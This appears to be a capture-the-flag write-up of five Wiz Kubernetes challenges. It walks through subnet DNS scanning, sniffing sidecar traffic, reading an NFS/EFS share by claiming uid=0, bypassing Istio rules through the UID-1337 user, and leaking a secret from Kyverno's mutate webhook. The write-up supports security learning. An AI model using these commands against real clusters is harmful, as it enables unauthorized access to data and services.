Hi @all, it's been a week and, as usual, the hackweekend session is back with a new topic. Today we continue learning about Cloud Security, but this time with a Red Team focus, through some very cool technical challenges hosted by Wiz.io. Let's dig in.
Link to challenge: https://k8slanparty.com/
Description
You have shell access to a compromised Kubernetes pod at the bottom of this page, and your next objective is to compromise other internal services further.
As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have loaded your machine with dnscan to ease this process for further challenges.
Hint 1
Make sure you scan the correct subnet. You can get a hint of what the correct subnet is by looking at the Kubernetes API server address in the machine’s environment variables.
Hint 2
The cluster subnet is 10.100.0.0/16.
This challenge is about the recon step, an important part of attacking or pentesting any target on the internet. The endpoints you discover are where you will place your exploit or payload; if you can't find anything about the target, you can't do anything.
With the hints, you know the mission: scan and find out which DNS names or IPs you can attack from your shell. That means you need some knowledge of networking and CIDR; learn more in the content below.
Given this type of challenge and Hint 1, you already know the target is the network, so we need to scan DNS to find the interesting services. DNS will resolve the IPs of the targets for you.
First of all, check the current interfaces with the `ifconfig` command; it shows us the networks already attached to the shell.
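For example (if `ifconfig` isn't available on the pod, `ip addr` is the usual fallback):
```
ifconfig        # list interfaces with their addresses and netmasks
# or, on images without net-tools:
ip addr show
```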
If you look around this network, you can see the subnet mask of `ns-1262e6` is tiny: `255.255.255.254` (a /31), which holds only 2 addresses. You can play with networks and learn about CIDR or VLSM with a CIDR / VLSM Calculator. This means the network attached to the interface is not the actual target; think about the Kubernetes service network instead, because we are playing inside a pod.
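A quick back-of-the-envelope on why that interface subnet is useless and why the guesses below are /24 and /16:
```
# Host addresses in a subnet = 2^(32 - prefix length)
# /31 (255.255.255.254) -> 2^1  = 2 addresses      (the tiny interface subnet)
# /24 (255.255.255.0)   -> 2^8  = 256 addresses    (fast first guess)
# /16 (255.255.0.0)     -> 2^16 = 65,536 addresses (the cluster range 10.100.0.0/16)
```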
To find that network, check the environment variables, where it is usually exposed. You can use the `env` command to list them.
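A minimal check, relying on the standard variables Kubernetes injects into every pod:
```
env | grep -i kubernetes
# KUBERNETES_SERVICE_HOST=10.100.0.1   <- the API server address from Hint 1
# KUBERNETES_SERVICE_PORT=443
```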
But we still have to guess the CIDR range, because the environment only exposes the Kubernetes API host `10.100.0.1` and says nothing about the netmask. That means we need to brute-force to find the target; there are two CIDRs to focus on. First try `/24`; if you don't get anything, the other choice is `/16` (Hint 2 respects your time, so you don't waste too long waiting).
```
dnscan -subnet <CIDR or Wildcard> # (valid: 10.100.0.0/16)
```
After you find the target's IP and DNS name, you can send a simple request to it with the `curl` command; if the request gets a response, HTTP is working on that host:
```
curl http://10.100.136.254
```
You get the flag, returned as a raw string from the target.
Flag: wiz_k8s_lan_party{between-thousands-xxx-xxx-xxx-found-your-northen-star}
A simple challenge, but you need to go step by step to find the target. Always give time to reconnaissance and you will never be disappointed.
Description
Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.
Hint 1
The sidecar container shares the same lifecycle, resources, and network namespace as the main container.
Hint 2
The machine is preloaded with `tcpdump`, which can be used to sniff the sidecar's network traffic.
Hold on, this challenge gives us a chance to learn how to capture traffic in transit on the network, from browsers and other clients. It should also make you think: if HTTPS is not set up, your credentials can be exposed when someone performs a MITM (man-in-the-middle) attack on your network.
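To see why, here is an illustrative sniff of plain HTTP (the interface name and output are hypothetical); anything sent without TLS shows up as readable text:
```
tcpdump -i eth0 -A 'tcp port 80'
# POST /login HTTP/1.1
# ...
# username=admin&password=hunter2   <- visible to anyone on the path
```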
As in challenge 1, you need to find the target with `dnscan` in the network `10.100.0.0/16`:
```
dnscan -subnet 10.100.0.0/16
```
Result
```
10.100.171.123 reporting-service.k8s-lan-party.svc.cluster.local
```
Once you know the target, use `tcpdump` to sniff and capture the contents communicated on the network; this time the network interface is actually helpful:
```
# find your interface with ifconfig or ip addr
tcpdump -i <net-interface> host reporting-service.k8s-lan-party.svc.cluster.local -A # mine was ns-faf90c
```
Note: use the `-A` flag to print the contents of each packet in ASCII; the raw flag will be exposed. The flag reveals itself as you read the captured packets, because the traffic is not encrypted or masked in any way.
Flag: wiz_k8s_lan_party{good-crime-comes-xxx-xxx-xxx-in-a-sidecar}
In this challenge, you learned how to capture and sniff network packets in transit. If you don't apply any protection, a hacker can capture your traffic and single you out as a target. So be careful when supplying credentials, passwords, or anything private to an anonymous or non-`https` website.
Learn more about the protection
Description
The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦️.
Hint 1
You might find it useful to look at the documentation for nfs-cat and nfs-ls.
Hint 2
The following NFS parameters should be used in your connection string: version, uid and gid
In this challenge, you are required to read private content stored on a machine and exposed via the network, as the description says. You will need real skill and knowledge to figure out how this challenge works. It has a very interesting approach and plenty of tricks to test players' patience.
To know what tools we have, check `$PATH` to find the binary directories, and yup, we find the NFS tooling:
```
echo $PATH
ls -la /usr/local/bin
```
So, based on HackTricks - 2049 - Pentesting NFS Service, you can use `nmap` to validate that NFS is open on this host:
```
nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 10.100.0.1
```
The NFS protocol is indeed running, so that's what we'll work with.
After recon and discovery of the folders on the host, we learn there is at least a `flag.txt` inside the pod at the `/efs/flag.txt` path, but we don't have permission to read it.
We found the mount directory; now try to figure out the target. `showmount -e` doesn't work here (you can dig at it, but you get no results), so use the `df` command instead:
```
df -a
```
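Illustratively, the line that matters in that output is the EFS mount (hostname taken from the next step; sizes omitted):
```
# Filesystem                                          ... Mounted on
# fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/  ... /efs
```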
That gives us the list of mounts; take a look at the domain, which belongs to the EFS service of AWS. Use the `dig` command to figure out the IP behind it, or just use the URL directly:
```
dig +short A fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com
```
Next, use the `nfs-ls` command to list the contents inside the mount (NOTE: per Hint 2, remember to provide the version so the command executes successfully):
```
nfs-ls nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/?version=4
```
Then use `nfs-cat` to read the contents of the `flag.txt` file. The format is finicky: when you put only a single `/` in the URL, the request returns an error:
```
nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/flag.txt?version=4"
```
This means you need another guess for this EFS; as pentesters often do, add another slash, and it works:
```
nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4"
```
As you can see, this challenge is messy and we still don't get the flag. Per Hint 2, we need to provide a `uid` or `gid` to read the contents.
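These parameters come from libnfs, which `nfs-ls`/`nfs-cat` are built on; a sketch of the URL format and why `uid` matters:
```
# libnfs URL format: nfs://<server>/<path>?version=<3|4>&uid=<n>&gid=<n>
# uid/gid set the AUTH_SYS credentials the client claims to the server;
# NFS without Kerberos simply trusts them, so claiming uid=0 means "I am root".
nfs-ls "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/?version=4&uid=0&gid=0"
```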
First of all, step back to `nfs.conf` to look at the configuration:
```
#
# This is a general configuration for the
# NFS daemons and tools
#
[general]
pipefs-directory=/run/rpc_pipefs
#
[exports]
# rootdir=/export
#
[exportfs]
# debug=0
#
[gssd]
# verbosity=0
# rpc-verbosity=0
# use-memcache=0
# use-machine-creds=1
# use-gss-proxy=0
# avoid-dns=1
# limit-to-legacy-enctypes=0
# context-timeout=0
# rpc-timeout=5
# keytab-file=/etc/krb5.keytab
# cred-cache-directory=
# preferred-realm=
#
[lockd]
# port=0
# udp-port=0
#
[mountd]
# debug=0
manage-gids=y
# descriptors=0
# port=0
# threads=1
# reverse-lookup=n
# state-directory-path=/var/lib/nfs
# ha-callout=
#
[nfsdcld]
# debug=0
# storagedir=/var/lib/nfs/nfsdcld
#
[nfsdcltrack]
# debug=0
# storagedir=/var/lib/nfs/nfsdcltrack
#
[nfsd]
# debug=0
# threads=8
# host=
# port=0
# grace-time=90
# lease-time=90
# udp=n
# tcp=y
# vers2=n
# vers3=y
# vers4=y
# vers4.0=y
# vers4.1=y
# vers4.2=y
# rdma=n
# rdma-port=20049
#
[statd]
# debug=0
# port=0
# outgoing-port=0
# name=
# state-directory-path=/var/lib/nfs/statd
# ha-callout=
# no-notify=0
#
[sm-notify]
# debug=0
# force=0
# retry-time=900
# outgoing-port=
# outgoing-addr=
# lift-grace=y
#
[svcgssd]
# principal=
```
Not actually helpful, so let's guess with the current shell user, `uid=1001` (player):
```
nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4&uid=1001"
```
Not right; try another guess and pick the root ID, i.e. set `uid=0`:
```
nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4&uid=0"
```
and the flag is revealed.
Flag: wiz_k8s_lan_party{old-school-network-file-shares-xxx-xxx-cloud!}
Through this challenge, you learn a lot about patience, analysis, and researching techniques for attacking a machine. I honestly still need to learn more about it myself, but it was a really cool experience.
`NFS` can do a lot, but if you don't protect it, anything on it can be exposed and `NFS` itself can be turned into a target for exploitation.
Learn more about NFS and common attack methodology in What Are the Dangers Of a NFS Vulnerability Or Attack?
Description
Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don't abuse this power; use it responsibly and with caution.
Hint 1
Try examining Istio's IPTables rules.
Hint 2
Try executing "cat /etc/passwd | grep 1337", to find the user that can bypass the Istio's IPTables rules
In this challenge, you come back to one of the key concepts around Kubernetes: the service mesh.
What is a service mesh?
A service mesh is a software layer that handles all communication between services in applications. This layer is composed of containerized microservices. As applications scale and the number of microservices increases, it becomes challenging to monitor the performance of the services. To manage connections between services, a service mesh provides new features like monitoring, logging, tracing, and traffic control. It’s independent of each service’s code, which allows it to work across network boundaries and with multiple service management systems.
With a service mesh, you can handle lots of things, like service discovery, load balancing, traffic management, … Explore more: What is a Service Mesh?
Istio is one of the most popular service meshes, commonly set up as part of a Kubernetes cluster, and your challenge is to find a way to bypass Istio's restricted routes and reveal the flag.
First of all, scan the DNS of the target we need to attack with `dnscan`:
```
dnscan -subnet 10.100.*.*
```
Scan result:
```
10.100.224.159 -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
```
Next, I try to access it with the `GET` and `POST` methods, but you won't have permission because of the RBAC policy Istio applies; that means we need to find a way to bypass it.
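For context, a blocked request looks roughly like this (the body is Istio's standard rejection message, quoted from memory):
```
curl -v istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
# < HTTP/1.1 403 Forbidden
# RBAC: access denied
```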
Hint 1 talks about playing with iptables, so you can explore Istio's iptables rules through some articles. After a bit of trying, you learn that the `istio` user really exists and that the iptables rules treat it specially: traffic from the account with UID and GID `1337` is excluded from redirection, because that is the user the sidecar proxy itself runs as to forward traffic between sidecars. Explore more: Understanding IPTables snapshot
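The relevant rules are the standard ones Istio's init container installs; a sketch (paraphrased from Istio's iptables redirection setup):
```
iptables -t nat -L ISTIO_OUTPUT -n
# Traffic owned by UID/GID 1337 RETURNs early, i.e. it skips the
# redirect-to-Envoy chains, so the proxy's own traffic doesn't loop:
# RETURN  all  --  0.0.0.0/0  0.0.0.0/0  owner UID match 1337
# RETURN  all  --  0.0.0.0/0  0.0.0.0/0  owner GID match 1337
```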
So you can switch to the `istio` user to escape the current root user, a trick from this implementation that I only understood after opening Hint 2. You can switch users with the `su` command:
```
su - istio
```
Yup, we are now the other user, `istio`, which means we can bypass the rules the service mesh applies to prevent us from getting the flag from the host. Try again and reveal the flag:
```
curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
```
Flag: wiz_k8s_lan_party{only-leet-hex0rs-xxx-xxx-both-k8s-and-linux}
Through this challenge I got new experience with `istio` as a target. The first try is always hard, but this was quite a fun challenge: the methodology is simple, but you must understand the concept in order to bypass it. Nothing is ever fully secure, so you must keep learning and restrict access as much as possible.
More best practices with Istio
Description
Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative
Hint 1
Need a hand crafting AdmissionReview requests? Checkout https://github.com/anderseknert/kube-review.
Hint 2
This exercise consists of three ingredients: kyverno's hostname (which can be found via dnscan), the relevant HTTP path (which can be found in Kyverno's source code) and the AdmissionsReview request.
The last challenge: a very cool and unusual kind of vulnerability that you don't see every day - lateral movement. It gets even more interesting because it involves `kyverno`, a policy agent that runs on the cluster and provides methods to secure and protect data and permissions in Kubernetes.
In this challenge, you need to retrieve the flag from Kyverno's `mutate` webhook, in a more sophisticated way: crafting an `AdmissionReview` request to pull off a `lateral movement` attack. Let's dig in.
First of all, use `dnscan` to get targets for the attack process.
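Same tool as in the earlier challenges, pointed at the cluster service range:
```
dnscan -subnet 10.100.0.0/16
```
We get a ton of endpoints: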
```
10.100.86.210 -> kyverno-cleanup-controller.kyverno.svc.cluster.local.
10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.
```
From the hints, I figured out we need to attack the Kyverno pod via `mutate` with an HTTP request carrying an `AdmissionReview` payload. That means you need something to craft the `AdmissionReview` that you will send to the `mutate` route, so you can grab the flag from the response. Hint 1 suggests exactly that: kube-review - Create Kubernetes AdmissionReview requests from Kubernetes resource manifests
So we can do that as in kube-review's example, in a few steps. I usually play with `debian`, so I create a pod manifest based on it (`k` is the usual alias for `kubectl`):
```
k run playkube --image=debian:11.7 --dry-run=client -o yaml > playkube.yaml
```
This command writes the pod manifest without applying it to the cluster. `tail -f /dev/null` is the usual trick to keep the shell running forever on `debian` or `ubuntu`; read more: StackOverFlow - How can I keep a container running on Kubernetes?. You can add it inside the manifest. (Not recommended: passing it via `--command`; I don't know why, but pod creation fails that way, so it's better to split the steps than to combine them into one.)
Output
```
# playkube.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: playkube
  name: playkube
spec:
  containers:
  - command:
    - "sh"
    - "-c"
    - "tail -f /dev/null"
    image: debian:11.7
    name: playkube
    resources: {}
  dnsPolicy: ClusterFirst
  restartPolicy: Always
status: {}
```
Download kube-review:
```
wget https://github.com/anderseknert/kube-review/releases/download/v0.3.0/kube-review-linux-amd64 -O kube-review
```
Now you will have `kube-review` in your shell; make it executable and play with it:
```
chmod +x kube-review
./kube-review create playkube.yaml > playkube.json
```
Output
```
# playkube.json
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "5f04e525-a601-4098-89e2-45bee89f96d7"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
```
Alright, the next step is to learn how Kyverno works, i.e. what an HTTP request to `mutate` means.
First of all, Kyverno listens on port 443, which means you need to send requests over `https` to actually reach it. Honestly, at this step I couldn't figure anything out on my own, and Morteza Khazamipour's writeup is what helped me: he spoils the Kyverno path, which isn't mentioned anywhere in the documentation; here is the source file for the `mutate` webhook provided by Kyverno. Therefore, I have the complete `curl` exploitation to reach the flag, but before doing that you need to write the JSON onto your pod, using `cat`:
```
cat <<EOF > pod.json
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "5f04e525-a601-4098-89e2-45bee89f96d7"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
EOF
```
After that, you can build the `curl` command, like:
```
curl --insecure -H "Content-Type: application/json" --data-binary "@pod.json" -X POST "https://kyverno-svc.kyverno.svc.cluster.local/mutate" | jq
```
Output
```
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "5f04e525-a601-4098-89e2-45bee89f96d7"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
},
"response": {
"uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115",
"allowed": true
}
}
```
But this is a failure, because we made a mistake: the pod should run in the targeted namespace and ours doesn't. So change `playkube.yaml` to set `metadata.namespace: sensitive-ns`:
```
# playkube.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: playkube
  name: playkube
  namespace: sensitive-ns
spec:
  containers:
  - command:
    - "sh"
    - "-c"
    - "tail -f /dev/null"
    image: debian:11.7
    name: playkube
    resources: {}
  dnsPolicy: ClusterFirst
  restartPolicy: Always
status: {}
```
Run `kube-review` again and turn it into JSON:
```
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "ca6a6def-925c-436f-98e2-d135604219b8",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"namespace": "sensitive-ns",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "bd6a3823-8e4e-44d3-bd70-8309b58d619c"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"namespace": "sensitive-ns",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
```
Write it to `pod.json` and run the `curl` command above; your shell will get the response you need:
```
cat <<EOF > pod.json
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "ca6a6def-925c-436f-98e2-d135604219b8",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"namespace": "sensitive-ns",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "bd6a3823-8e4e-44d3-bd70-8309b58d619c"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"namespace": "sensitive-ns",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
EOF

curl --insecure -H "Content-Type: application/json" --data-binary "@pod.json" -X POST "https://kyverno-svc.kyverno.svc.cluster.local/mutate" | jq
```
Output
```
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "ca6a6def-925c-436f-98e2-d135604219b8",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "playkube",
"namespace": "sensitive-ns",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "bd6a3823-8e4e-44d3-bd70-8309b58d619c"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "playkube",
"namespace": "sensitive-ns",
"creationTimestamp": null,
"labels": {
"run": "playkube"
}
},
"spec": {
"containers": [
{
"name": "playkube",
"image": "debian:11.7",
"command": [
"sh",
"-c",
"tail -f /dev/null"
],
"resources": {}
}
],
"restartPolicy": "Always",
"dnsPolicy": "ClusterFirst"
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
},
"response": {
"uid": "ca6a6def-925c-436f-98e2-d135604219b8",
"allowed": true,
"patch": "W3sib3AiOiJhZGQiLCJwYXRoIjoiL3NwZWMvY29udGFpbmVycy8wL2VudiIsInZhbHVlIjpbeyJuYW1lIjoiRkxBRyIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9XX0sIHsicGF0aCI6Ii9tZXRhZGF0YS9hbm5vdGF0aW9ucyIsIm9wIjoiYWRkIiwidmFsdWUiOnsicG9saWNpZXMua3l2ZXJuby5pby9sYXN0LWFwcGxpZWQtcGF0Y2hlcyI6ImluamVjdC1lbnYtdmFycy5hcHBseS1mbGFnLXRvLWVudi5reXZlcm5vLmlvOiBhZGRlZCAvc3BlYy9jb250YWluZXJzLzAvZW52XG4ifX1d",
"patchType": "JSONPatch"
}
}
```
Yup, we got it: the patch content is base64-encoded, so you just need to decode it. With `jq` this can easily be done like:
```
curl --insecure -H "Content-Type: application/json" --data-binary "@pod.json" -X POST "https://kyverno-svc.kyverno.svc.cluster.local/mutate" | jq -r ".response.patch" | base64 -d | xargs
```
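For clarity, the decoded `patch` is a JSONPatch that injects the flag as a container environment variable; roughly (flag masked as below, annotation patch trimmed):
```
echo "<response.patch value>" | base64 -d
# [{"op":"add","path":"/spec/containers/0/env",
#   "value":[{"name":"FLAG","value":"wiz_k8s_lan_party{...}"}]}, ...]
```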
Flag: wiz_k8s_lan_party{you-are-k8s-net-xxx-xxx-xxx-xxx-to-mutate-your-way-to-victory}
This challenge is very interesting: a new attack methodology that can exploit the admission chain and reveal its secrets. I will write a post or blog to talk more about this one. Kyverno is a cluster component that offers you more options to protect and restrict access to data. There are more things in this challenge that need research; a very cool challenge.
I hope you had a good time and enjoyed the challenges from wiz.io; I respect and appreciate what they bring to the community. I learned a lot about new methodologies and attack chains, practiced more red team skills, and got to learn more about the technologies involved, especially Kubernetes.
Maybe in the next session we will continue to find cool things and try more challenges from other resources. Stay safe, hack, and do more fun things. Be back for the next session. See ya!!!
You can find me on: